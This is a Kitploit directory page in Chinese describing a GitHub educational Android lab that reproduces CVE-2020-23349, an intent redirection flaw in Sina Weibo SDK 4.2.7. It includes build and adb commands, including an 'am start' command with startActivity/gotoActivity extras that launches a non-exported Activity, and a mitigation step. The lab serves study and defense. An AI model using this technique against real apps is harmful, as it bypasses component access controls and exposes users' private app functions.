Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2020-23349_Lab — 新浪微博 SDK 4.2.7 中 CVE-2020-23349 的教育型 Android 实验环境 | Kitploit
工具/GitHubGitHub/lazybear8372/cve-2020-23349_lab
Android安全漏洞分析漏洞利用移动应用渗透测试移动安全学习与教育实验室与实践
GitHublazybear8372/cve-2020-23349_lab

CVE-2020-23349_Lab

新浪微博 SDK 4.2.7 中 CVE-2020-23349 的教育型 Android 实验环境

查看仓库
101个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2020-23349 Android 实验

这是一个在本地复现新浪微博 Android SDK 4.2.7 中 Intent 重定向漏洞的教学项目。

请仅在获得授权的测试设备或模拟器上使用。请勿将其用于针对真实用户应用。

构成

  • victim: 包含实际 openDefault-4.2.7.aar 的漏洞应用
  • attacker: 调用 exported WbShareTransActivity 的攻击应用
  • victim/.../PrivateActivity: android:exported="false" 的复现目标

漏洞流程如下:

root@kitploit:~
Attacker 앱
  -> exported WbShareTransActivity
  -> Intent Extra의 startActivity/gotoActivity
  -> victim의 PrivateActivity 실행

构建

需要 Android SDK 36 和 JDK 17。

root@kitploit:~
./gradlew clean assembleDebug

生成文件:

root@kitploit:~
victim/build/outputs/apk/debug/victim-debug.apk
attacker/build/outputs/apk/debug/attacker-debug.apk

安装与复现

root@kitploit:~
adb install -r victim/build/outputs/apk/debug/victim-debug.apk
adb install -r attacker/build/outputs/apk/debug/attacker-debug.apk
adb shell am start -n lab.cve202023349.attacker/.MainActivity
  1. 如有需要,先运行一次 Victim 应用。
  2. 在 Attacker 应用中点击 Launch private Activity 按钮。
  3. 如果出现 EXPLOIT SUCCESS 界面,即表示复现成功。

也可以直接通过 ADB 复现。

root@kitploit:~
adb shell am start \
  -n lab.cve202023349.victim/com.sina.weibo.sdk.share.WbShareTransActivity \
  --es startActivity lab.cve202023349.victim.PrivateActivity \
  --es gotoActivity lab.cve202023349.victim.PrivateActivity

为什么有效

SDK 4.2.7 信任外部 Intent 中的 startActivity 和 gotoActivity 字符串,并以如下形式使用它们:

root@kitploit:~
resultIntent.setClassName(this, startActivityName);
startActivity(resultIntent);

由于 this 是 Victim 应用的 Context,Android 会将其视为 Victim 应用在启动自己的私有 Activity。

在现代 Android 构建中必须显式声明 android:exported,因此本项目为了复现旧版 SDK 的隐式 exported 状态,在 victim/AndroidManifest.xml 中显式将其指定为 true。

缓解演练

在不需要分享功能的演练中,将以下值改为 false 并重新构建。

root@kitploit:~
<activity
    android:name="com.sina.weibo.sdk.share.WbShareTransActivity"
    android:exported="false" />

之后再执行相同攻击,会被 SecurityException 阻止。在实际产品中,应移除 Weibo SDK 4.x 并升级到最新的维护版本。

SDK 来源

包含的 AAR 来自新浪微博官方公开仓库的 4.2.7 提交。

  • 仓库:https://github.com/sinaweibosdk/weibo_android_sdk
  • 提交:99daf8a (4.2.7)
  • 文件:新文档/openDefault-4.2.7.aar
下载工具